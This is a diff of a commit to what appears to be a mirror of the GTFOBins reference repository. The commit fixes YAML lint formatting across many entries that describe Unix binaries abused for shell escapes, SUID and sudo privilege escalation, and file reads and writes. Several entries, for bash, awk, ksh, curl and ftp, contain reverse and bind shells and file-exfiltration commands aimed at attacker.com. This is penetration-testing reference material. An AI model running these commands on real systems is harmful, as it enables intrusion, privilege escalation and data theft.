mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2024-12-06 11:02:37 +01:00
Fix YAMLs according to YAMLlint
This commit is contained in:
parent
785126ede0
commit
e1cd3aed68
3
.yamllint
Normal file
3
.yamllint
Normal file
@ -0,0 +1,3 @@
|
||||
extends: default
|
||||
rules:
|
||||
line-length: disable
|
5
Makefile
5
Makefile
@ -1,4 +1,4 @@
|
||||
.PHONY: serve serve-public bundle
|
||||
.PHONY: serve serve-public bundle lint
|
||||
|
||||
serve:
|
||||
bundle exec jekyll serve
|
||||
@ -8,3 +8,6 @@ serve-public:
|
||||
|
||||
bundle:
|
||||
bundle install
|
||||
|
||||
lint:
|
||||
yamllint . _gtfobins/*.md
|
||||
|
@ -1,3 +1,4 @@
|
||||
---
|
||||
title: GTFOBins
|
||||
|
||||
exclude: ['/Gemfile', '/Makefile', '/README.md', '/CONTRIBUTING.md']
|
||||
|
@ -1,3 +1,4 @@
|
||||
---
|
||||
execute-interactive:
|
||||
label: Interactive execute
|
||||
description: |
|
||||
|
@ -1,13 +1,13 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: ash
|
||||
- code: ash
|
||||
file-write:
|
||||
- code: |
|
||||
export LFILE=file_to_write
|
||||
ash -c 'echo data > $LFILE'
|
||||
- code: |
|
||||
export LFILE=file_to_write
|
||||
ash -c 'echo data > $LFILE'
|
||||
suid-enabled:
|
||||
- code: "./ash"
|
||||
- code: "./ash"
|
||||
sudo-enabled:
|
||||
- code: sudo ash
|
||||
- code: sudo ash
|
||||
---
|
||||
|
@ -1,34 +1,34 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: awk 'BEGIN {system("/bin/sh")}'
|
||||
- code: awk 'BEGIN {system("/bin/sh")}'
|
||||
reverse-shell-non-interactive:
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
RPORT=12345
|
||||
awk -v RHOST=$RHOST -v RPORT=$RPORT 'BEGIN {
|
||||
s = "/inet/tcp/0/" RHOST "/" RPORT;
|
||||
while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break;
|
||||
while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
RPORT=12345
|
||||
awk -v RHOST=$RHOST -v RPORT=$RPORT 'BEGIN {
|
||||
s = "/inet/tcp/0/" RHOST "/" RPORT;
|
||||
while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break;
|
||||
while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'
|
||||
bind-shell-non-interactive:
|
||||
- description: Run `nc target.com 12345` on the attacker box to connect to the shell.
|
||||
code: |
|
||||
LPORT=12345
|
||||
awk -v LPORT=$LPORT 'BEGIN {
|
||||
s = "/inet/tcp/" LPORT "/0/0";
|
||||
while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break;
|
||||
while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'
|
||||
- description: Run `nc target.com 12345` on the attacker box to connect to the shell.
|
||||
code: |
|
||||
LPORT=12345
|
||||
awk -v LPORT=$LPORT 'BEGIN {
|
||||
s = "/inet/tcp/" LPORT "/0/0";
|
||||
while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break;
|
||||
while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'
|
||||
file-write:
|
||||
- code: |
|
||||
LFILE=file_to_write
|
||||
awk -v LFILE=$LFILE 'BEGIN { print "data" > LFILE }'
|
||||
- code: |
|
||||
LFILE=file_to_write
|
||||
awk -v LFILE=$LFILE 'BEGIN { print "data" > LFILE }'
|
||||
file-read:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
awk '//' "$LFILE"
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
awk '//' "$LFILE"
|
||||
sudo-enabled:
|
||||
- code: sudo awk 'BEGIN {system("/bin/sh")}'
|
||||
- code: sudo awk 'BEGIN {system("/bin/sh")}'
|
||||
suid-limited:
|
||||
- code: ./awk 'BEGIN {system("/bin/sh")}'
|
||||
- code: ./awk 'BEGIN {system("/bin/sh")}'
|
||||
---
|
||||
|
@ -1,15 +1,15 @@
|
||||
---
|
||||
functions:
|
||||
file-read:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
base64 "$LFILE" | base64 --decode
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
base64 "$LFILE" | base64 --decode
|
||||
suid-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./base64 "$LFILE" | base64 --decode
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./base64 "$LFILE" | base64 --decode
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo base64 "$LFILE" | base64 --decode
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo base64 "$LFILE" | base64 --decode
|
||||
---
|
||||
|
@ -1,55 +1,52 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: bash
|
||||
- code: bash
|
||||
reverse-shell-interactive:
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
bash -c 'bash -i >& /dev/tcp/$RHOST/$RPORT 0>&1'
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
bash -c 'bash -i >& /dev/tcp/$RHOST/$RPORT 0>&1'
|
||||
upload:
|
||||
- description: Send local file in the body of an HTTP POST request. Run an HTTP
|
||||
service on the attacker box to collect the file.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
export LFILE=file_to_send
|
||||
bash -c 'echo -e "POST / HTTP/0.9\n\n$(<$LFILE)" > /dev/tcp/$RHOST/$RPORT'
|
||||
- description: Send local file using a TCP connection. Run `nc -l -p 12345 > "file_to_save"`
|
||||
on the attacker box to collect the file.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
export LFILE=file_to_send
|
||||
bash -c 'cat $LFILE > /dev/tcp/$RHOST/$RPORT'
|
||||
- description: Send local file in the body of an HTTP POST request. Run an HTTP service on the attacker box to collect the file.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
export LFILE=file_to_send
|
||||
bash -c 'echo -e "POST / HTTP/0.9\n\n$(<$LFILE)" > /dev/tcp/$RHOST/$RPORT'
|
||||
- description: Send local file using a TCP connection. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
export LFILE=file_to_send
|
||||
bash -c 'cat $LFILE > /dev/tcp/$RHOST/$RPORT'
|
||||
download:
|
||||
- description: Fetch a remote file via HTTP GET request.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
export LFILE=file_to_get
|
||||
bash -c '{ echo -ne "GET /$LFILE HTTP/1.0\r\nhost: $RHOST\r\n\r\n" 1>&3; cat 0<&3; } \
|
||||
3<>/dev/tcp/$RHOST/$RPORT \
|
||||
| { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE'
|
||||
- description: Fetch remote file using a TCP connection. Run `nc -l -p 12345 < "file_to_send"`
|
||||
on the attacker box to send the file.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
export LFILE=file_to_get
|
||||
bash -c 'cat < /dev/tcp/$RHOST/$RPORT > $LFILE'
|
||||
- description: Fetch a remote file via HTTP GET request.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
export LFILE=file_to_get
|
||||
bash -c '{ echo -ne "GET /$LFILE HTTP/1.0\r\nhost: $RHOST\r\n\r\n" 1>&3; cat 0<&3; } \
|
||||
3<>/dev/tcp/$RHOST/$RPORT \
|
||||
| { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE'
|
||||
- description: Fetch remote file using a TCP connection. Run `nc -l -p 12345 < "file_to_send"` on the attacker box to send the file.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
export LFILE=file_to_get
|
||||
bash -c 'cat < /dev/tcp/$RHOST/$RPORT > $LFILE'
|
||||
file-write:
|
||||
- code: |
|
||||
export LFILE=file_to_write
|
||||
bash -c 'echo data > $LFILE'
|
||||
- code: |
|
||||
export LFILE=file_to_write
|
||||
bash -c 'echo data > $LFILE'
|
||||
file-read:
|
||||
- description: It trims trailing newlines and it's not binary-safe.
|
||||
code: |
|
||||
export LFILE=file_to_read
|
||||
bash -c 'echo "$(<$LFILE)"'
|
||||
- description: It trims trailing newlines and it's not binary-safe.
|
||||
code: |
|
||||
export LFILE=file_to_read
|
||||
bash -c 'echo "$(<$LFILE)"'
|
||||
suid-enabled:
|
||||
- code: "./bash -p"
|
||||
- code: "./bash -p"
|
||||
sudo-enabled:
|
||||
- code: sudo bash
|
||||
- code: sudo bash
|
||||
---
|
||||
|
@ -1,27 +1,25 @@
|
||||
---
|
||||
description: |
|
||||
BusyBox may contain many UNIX utilities, run `busybox --list-full` to check
|
||||
description: BusyBox may contain many UNIX utilities, run `busybox --list-full` to check
|
||||
what GTFBins binaries are supported. Here some example.
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: busybox sh
|
||||
- code: busybox sh
|
||||
upload:
|
||||
- description: Serve files in the local folder running an HTTP server.
|
||||
code: |
|
||||
export LPORT=12345
|
||||
busybox httpd -f -p $LPORT -h .
|
||||
- description: Serve files in the local folder running an HTTP server.
|
||||
code: |
|
||||
export LPORT=12345
|
||||
busybox httpd -f -p $LPORT -h .
|
||||
file-write:
|
||||
- code: |
|
||||
LFILE=file_to_write
|
||||
busybox sh -c 'echo "data" > $LFILE'
|
||||
- code: |
|
||||
LFILE=file_to_write
|
||||
busybox sh -c 'echo "data" > $LFILE'
|
||||
file-read:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./busybox cat "$LFILE"
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./busybox cat "$LFILE"
|
||||
suid-enabled:
|
||||
- description: It may drop the SUID privileges depending on the compilation flags
|
||||
and the runtime configuration.
|
||||
code: "./busybox sh"
|
||||
- description: It may drop the SUID privileges depending on the compilation flags and the runtime configuration.
|
||||
code: "./busybox sh"
|
||||
sudo-enabled:
|
||||
- code: sudo busybox sh
|
||||
- code: sudo busybox sh
|
||||
---
|
||||
|
@ -1,15 +1,15 @@
|
||||
---
|
||||
functions:
|
||||
file-read:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
cat "$LFILE"
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
cat "$LFILE"
|
||||
suid-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./cat "$LFILE"
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./cat "$LFILE"
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo cat "$LFILE"
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo cat "$LFILE"
|
||||
---
|
||||
|
@ -1,9 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
execute-non-interactive:
|
||||
- description: The commands are executed according to the crontab file edited via the `crontab` utility.
|
||||
code: crontab -e
|
||||
- description: The commands are executed according to the crontab file edited via the `crontab` utility.
|
||||
code: crontab -e
|
||||
sudo-enabled:
|
||||
- description: The commands are executed according to the crontab file edited via the `crontab` utility.
|
||||
code: sudo crontab -e
|
||||
- description: The commands are executed according to the crontab file edited via the `crontab` utility.
|
||||
code: sudo crontab -e
|
||||
---
|
||||
|
@ -1,13 +1,13 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: csh
|
||||
- code: csh
|
||||
file-write:
|
||||
- code: |
|
||||
export LFILE=file_to_write
|
||||
ash -c 'echo data > $LFILE'
|
||||
- code: |
|
||||
export LFILE=file_to_write
|
||||
ash -c 'echo data > $LFILE'
|
||||
suid-enabled:
|
||||
- code: "./csh -b"
|
||||
- code: "./csh -b"
|
||||
sudo-enabled:
|
||||
- code: sudo csh
|
||||
- code: sudo csh
|
||||
---
|
||||
|
@ -1,21 +1,20 @@
|
||||
---
|
||||
functions:
|
||||
upload:
|
||||
- description: Send local file with an HTTP POST request. Run an HTTP service on
|
||||
the attacker box to collect the file.
|
||||
code: |
|
||||
URL=http://attacker.com/
|
||||
LFILE=file_to_send
|
||||
curl -X POST -d @$file_to_send $URL
|
||||
- description: Send local file with an HTTP POST request. Run an HTTP service on the attacker box to collect the file.
|
||||
code: |
|
||||
URL=http://attacker.com/
|
||||
LFILE=file_to_send
|
||||
curl -X POST -d @$file_to_send $URL
|
||||
download:
|
||||
- description: Fetch a remote file via HTTP GET request.
|
||||
code: |
|
||||
URL=http://attacker.com/file_to_get
|
||||
LFILE=file_to_save
|
||||
curl $URL -o $LFILE
|
||||
- description: Fetch a remote file via HTTP GET request.
|
||||
code: |
|
||||
URL=http://attacker.com/file_to_get
|
||||
LFILE=file_to_save
|
||||
curl $URL -o $LFILE
|
||||
file-read:
|
||||
- description: The file path must be absolute.
|
||||
code: |
|
||||
LFILE=/tmp/file_to_read
|
||||
curl file://$LFILE
|
||||
- description: The file path must be absolute.
|
||||
code: |
|
||||
LFILE=/tmp/file_to_read
|
||||
curl file://$LFILE
|
||||
---
|
||||
|
@ -1,15 +1,15 @@
|
||||
---
|
||||
functions:
|
||||
file-read:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
cut -d "" -f1 "$LFILE"
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
cut -d "" -f1 "$LFILE"
|
||||
suid-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./cut -d "" -f1 "$LFILE"
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./cut -d "" -f1 "$LFILE"
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo cut -d "" -f1 "$LFILE"
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo cut -d "" -f1 "$LFILE"
|
||||
---
|
||||
|
@ -1,13 +1,13 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: dash
|
||||
- code: dash
|
||||
file-write:
|
||||
- code: |
|
||||
export LFILE=file_to_write
|
||||
ash -c 'echo data > $LFILE'
|
||||
- code: |
|
||||
export LFILE=file_to_write
|
||||
ash -c 'echo data > $LFILE'
|
||||
suid-enabled:
|
||||
- code: "./dash -p"
|
||||
- code: ./dash -p
|
||||
sudo-enabled:
|
||||
- code: sudo dash
|
||||
- code: sudo dash
|
||||
---
|
||||
|
@ -1,11 +1,11 @@
|
||||
---
|
||||
functions:
|
||||
file-write:
|
||||
- code: |
|
||||
LFILE=file_to_write
|
||||
echo "data" | dd of=$LFILE
|
||||
- code: |
|
||||
LFILE=file_to_write
|
||||
echo "data" | dd of=$LFILE
|
||||
file-read:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
dd if=LFILE
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
dd if=LFILE
|
||||
---
|
||||
|
@ -1,15 +1,15 @@
|
||||
---
|
||||
functions:
|
||||
file-read:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
diff --line-format=%L /dev/null $LFILE
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
diff --line-format=%L /dev/null $LFILE
|
||||
suid-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./diff --line-format=%L /dev/null $LFILE
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./diff --line-format=%L /dev/null $LFILE
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo diff --line-format=%L /dev/null $LFILE
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo diff --line-format=%L /dev/null $LFILE
|
||||
---
|
||||
|
@ -1,23 +1,21 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: |
|
||||
ed
|
||||
!/bin/sh
|
||||
- code: |
|
||||
ed
|
||||
!/bin/sh
|
||||
file-write:
|
||||
- code: |
|
||||
ed file_to_write
|
||||
w
|
||||
- code: |
|
||||
ed file_to_write
|
||||
w
|
||||
file-read:
|
||||
- code: 'ed file_to_read
|
||||
|
||||
'
|
||||
- code: ed file_to_read
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
sudo ed
|
||||
!/bin/sh
|
||||
- code: |
|
||||
sudo ed
|
||||
!/bin/sh
|
||||
suid-limited:
|
||||
- code: |
|
||||
./ed
|
||||
!/bin/sh
|
||||
- code: |
|
||||
./ed
|
||||
!/bin/sh
|
||||
---
|
||||
|
@ -1,17 +1,15 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: emacs -Q -nw --eval '(term "/bin/sh")'
|
||||
- code: emacs -Q -nw --eval '(term "/bin/sh")'
|
||||
file-write:
|
||||
- code: |
|
||||
emacs file_to_write
|
||||
C-x C-s
|
||||
- code: |
|
||||
emacs file_to_write
|
||||
C-x C-s
|
||||
file-read:
|
||||
- code: 'emacs file_to_read
|
||||
|
||||
'
|
||||
- code: emacs file_to_read
|
||||
suid-enabled:
|
||||
- code: ./emacs -Q -nw --eval '(term "/bin/sh -p")'
|
||||
- code: ./emacs -Q -nw --eval '(term "/bin/sh -p")'
|
||||
sudo-enabled:
|
||||
- code: sudo emacs -Q -nw --eval '(term "/bin/sh")'
|
||||
- code: sudo emacs -Q -nw --eval '(term "/bin/sh")'
|
||||
---
|
||||
|
@ -1,9 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: env /bin/sh
|
||||
- code: env /bin/sh
|
||||
suid-enabled:
|
||||
- code: "./env /bin/sh -p"
|
||||
- code: ./env /bin/sh -p
|
||||
sudo-enabled:
|
||||
- code: sudo env /bin/sh
|
||||
- code: sudo env /bin/sh
|
||||
---
|
||||
|
@ -1,18 +1,16 @@
|
||||
---
|
||||
description: 'The read file content is corrupted by replacing tabs with spaces.
|
||||
|
||||
'
|
||||
description: The read file content is corrupted by replacing tabs with spaces.
|
||||
functions:
|
||||
file-read:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
expand "$LFILE"
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
expand "$LFILE"
|
||||
suid-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./expand "$LFILE"
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./expand "$LFILE"
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo expand "$LFILE"
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo expand "$LFILE"
|
||||
---
|
||||
|
@ -1,9 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: expect -c 'spawn /bin/sh;interact'
|
||||
- code: expect -c 'spawn /bin/sh;interact'
|
||||
suid-enabled:
|
||||
- code: "./expect -c 'spawn /bin/sh -p;interact'"
|
||||
- code: ./expect -c 'spawn /bin/sh -p;interact'
|
||||
sudo-enabled:
|
||||
- code: sudo expect -c 'spawn /bin/sh;interact'
|
||||
- code: sudo expect -c 'spawn /bin/sh;interact'
|
||||
---
|
||||
|
@ -1,9 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: find . -exec /bin/sh \; -quit
|
||||
- code: find . -exec /bin/sh \; -quit
|
||||
suid-enabled:
|
||||
- code: "./find . -exec /bin/sh -p \\; -quit"
|
||||
- code: ./find . -exec /bin/sh -p \; -quit
|
||||
sudo-enabled:
|
||||
- code: sudo find . -exec /bin/sh \; -quit
|
||||
- code: sudo find . -exec /bin/sh \; -quit
|
||||
---
|
||||
|
@ -1,9 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: flock -u / /bin/sh
|
||||
- code: flock -u / /bin/sh
|
||||
suid-enabled:
|
||||
- code: "./flock -u / /bin/sh -p"
|
||||
- code: ./flock -u / /bin/sh -p
|
||||
sudo-enabled:
|
||||
- code: sudo flock -u / /bin/sh
|
||||
- code: sudo flock -u / /bin/sh
|
||||
---
|
||||
|
@ -1,18 +1,16 @@
|
||||
---
|
||||
description: 'The read file content is not binary-safe.
|
||||
|
||||
'
|
||||
description: The read file content is not binary-safe.
|
||||
functions:
|
||||
file-read:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
fmt -pNON_EXISTING_PREFIX "$LFILE"
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
fmt -pNON_EXISTING_PREFIX "$LFILE"
|
||||
suid-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./fmt -pNON_EXISTING_PREFIX "$LFILE"
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./fmt -pNON_EXISTING_PREFIX "$LFILE"
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo fmt -pNON_EXISTING_PREFIX "$LFILE"
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo fmt -pNON_EXISTING_PREFIX "$LFILE"
|
||||
---
|
||||
|
@ -1,15 +1,15 @@
|
||||
---
|
||||
functions:
|
||||
file-read:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
fold -w99999999 "$LFILE"
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
fold -w99999999 "$LFILE"
|
||||
suid-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./fold -w99999999 "$LFILE"
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./fold -w99999999 "$LFILE"
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo fold -w99999999 "$LFILE"
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo fold -w99999999 "$LFILE"
|
||||
---
|
||||
|
@ -1,23 +1,23 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: |
|
||||
ftp
|
||||
!/bin/sh
|
||||
- code: |
|
||||
ftp
|
||||
!/bin/sh
|
||||
upload:
|
||||
- description: Send local file to a FTP server.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
ftp $RHOST
|
||||
put file_to_send
|
||||
- description: Send local file to a FTP server.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
ftp $RHOST
|
||||
put file_to_send
|
||||
download:
|
||||
- description: Fetch a remote file from a FTP server.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
ftp $RHOST
|
||||
get file_to_get
|
||||
- description: Fetch a remote file from a FTP server.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
ftp $RHOST
|
||||
get file_to_get
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
sudo ftp
|
||||
!/bin/sh
|
||||
- code: |
|
||||
sudo ftp
|
||||
!/bin/sh
|
||||
---
|
||||
|
@ -7,11 +7,11 @@ description: |
|
||||
[version 3](/gtfobins/python3/).
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: gdb -nx -ex '!sh' -ex quit
|
||||
- code: gdb -nx -ex '!sh' -ex quit
|
||||
file-write:
|
||||
- code: |
|
||||
LFILE=file_to_write
|
||||
gdb -nx -ex "dump value $LFILE \"data\"" -ex quit
|
||||
- code: |
|
||||
LFILE=file_to_write
|
||||
gdb -nx -ex "dump value $LFILE \"data\"" -ex quit
|
||||
sudo-enabled:
|
||||
- code: sudo gdb -nx -ex '!sh' -ex quit
|
||||
- code: sudo gdb -nx -ex '!sh' -ex quit
|
||||
---
|
||||
|
@ -1,15 +1,15 @@
|
||||
---
|
||||
functions:
|
||||
file-read:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
head -c1G "$LFILE"
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
head -c1G "$LFILE"
|
||||
suid-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./head -c1G "$LFILE"
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./head -c1G "$LFILE"
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo head -c1G "$LFILE"
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo head -c1G "$LFILE"
|
||||
---
|
||||
|
@ -1,9 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: ionice /bin/sh
|
||||
- code: ionice /bin/sh
|
||||
suid-enabled:
|
||||
- code: "./ionice /bin/sh -p"
|
||||
- code: ./ionice /bin/sh -p
|
||||
sudo-enabled:
|
||||
- code: sudo ionice /bin/sh
|
||||
- code: sudo ionice /bin/sh
|
||||
---
|
||||
|
@ -1,15 +1,15 @@
|
||||
---
|
||||
functions:
|
||||
file-read:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
jq -Rr . "$LFILE"
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
jq -Rr . "$LFILE"
|
||||
suid-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./jq -Rr . "$LFILE"
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./jq -Rr . "$LFILE"
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo jq -Rr . "$LFILE"
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo jq -Rr . "$LFILE"
|
||||
---
|
||||
|
@ -1,59 +1,56 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: ksh
|
||||
- code: ksh
|
||||
reverse-shell-interactive:
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
ksh -c 'ksh -i > /dev/tcp/$RHOST/$RPORT 2>&1 0>&1'
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
ksh -c 'ksh -i > /dev/tcp/$RHOST/$RPORT 2>&1 0>&1'
|
||||
upload:
|
||||
- description: Send local file in the body of an HTTP POST request. Run an HTTP
|
||||
service on the attacker box to collect the file.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
export LFILE=file_to_send
|
||||
ksh -c 'echo -e "POST / HTTP/0.9\n\n$(cat $LFILE)" > /dev/tcp/$RHOST/$RPORT'
|
||||
- description: Send local file using a TCP connection. Run `nc -l -p 12345 > "file_to_save"`
|
||||
on the attacker box to collect the file.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
export LFILE=file_to_send
|
||||
ksh -c 'cat $LFILE > /dev/tcp/$RHOST/$RPORT'
|
||||
- description: Send local file in the body of an HTTP POST request. Run an HTTP service on the attacker box to collect the file.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
export LFILE=file_to_send
|
||||
ksh -c 'echo -e "POST / HTTP/0.9\n\n$(cat $LFILE)" > /dev/tcp/$RHOST/$RPORT'
|
||||
- description: Send local file using a TCP connection. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
export LFILE=file_to_send
|
||||
ksh -c 'cat $LFILE > /dev/tcp/$RHOST/$RPORT'
|
||||
download:
|
||||
- description: Fetch a remote file via HTTP GET request.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
export LFILE=file_to_get
|
||||
ksh -c '{ echo -ne "GET /$LFILE HTTP/1.0\r\nhost: $RHOST\r\n\r\n" 1>&3; cat 0<&3; } \
|
||||
3<>/dev/tcp/$RHOST/$RPORT \
|
||||
| { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE'
|
||||
- description: Fetch remote file using a TCP connection. Run `nc -l -p 12345 < "file_to_send"`
|
||||
on the attacker box to send the file.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
export LFILE=file_to_get
|
||||
ksh -c 'cat < /dev/tcp/$RHOST/$RPORT > $LFILE'
|
||||
- description: Fetch a remote file via HTTP GET request.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
export LFILE=file_to_get
|
||||
ksh -c '{ echo -ne "GET /$LFILE HTTP/1.0\r\nhost: $RHOST\r\n\r\n" 1>&3; cat 0<&3; } \
|
||||
3<>/dev/tcp/$RHOST/$RPORT \
|
||||
| { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE'
|
||||
- description: Fetch remote file using a TCP connection. Run `nc -l -p 12345 < "file_to_send"` on the attacker box to send the file.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
export LFILE=file_to_get
|
||||
ksh -c 'cat < /dev/tcp/$RHOST/$RPORT > $LFILE'
|
||||
file-write:
|
||||
- code: |
|
||||
export LFILE=file_to_write
|
||||
ksh -c 'echo data > $LFILE'
|
||||
- code: |
|
||||
export LFILE=file_to_write
|
||||
ksh -c 'echo data > $LFILE'
|
||||
file-read:
|
||||
- description: It trims trailing newlines.
|
||||
code: |
|
||||
